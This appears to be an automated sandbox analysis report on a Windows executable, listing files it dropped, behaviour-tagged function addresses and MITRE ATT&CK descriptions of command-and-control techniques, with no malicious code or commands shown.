Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_1D71.tmp.exe_1918b89e0607a918bed5cdf39c44a397aabe7f_8a7f9c8d_8ad28056-b3a7-4129-a303-e0ecd333cb80\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6816.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6AF5.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6BB2.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe

C:\Users\user\AppData\Local\Temp\1D71.tmp.exe

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
SEejSLAS9f.exe

Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150
clipboardsleepmemoryCOMMON

Function 004029F4 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134
networkfilesynchronizationCOMMON

Function 0043D03C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 00432F29 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Function 0247003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Function 00402C04 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 180
networkCOMMON

Function 004051D0 Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Function 0040C189 Relevance: 9.1, APIs: 6, Instructions: 51
COMMON

Function 00405800 Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Function 0042DFC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
threadCOMMON

Function 0042E114 Relevance: 4.6, APIs: 3, Instructions: 54
threadCOMMONLIBRARYCODE

Function 00434755 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Function 00402BAD Relevance: 4.5, APIs: 3, Instructions: 41
registryCOMMON

Function 0042E074 Relevance: 4.5, APIs: 3, Instructions: 31
threadCOMMON

Function 0040239E Relevance: 3.1, APIs: 2, Instructions: 125
windowCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre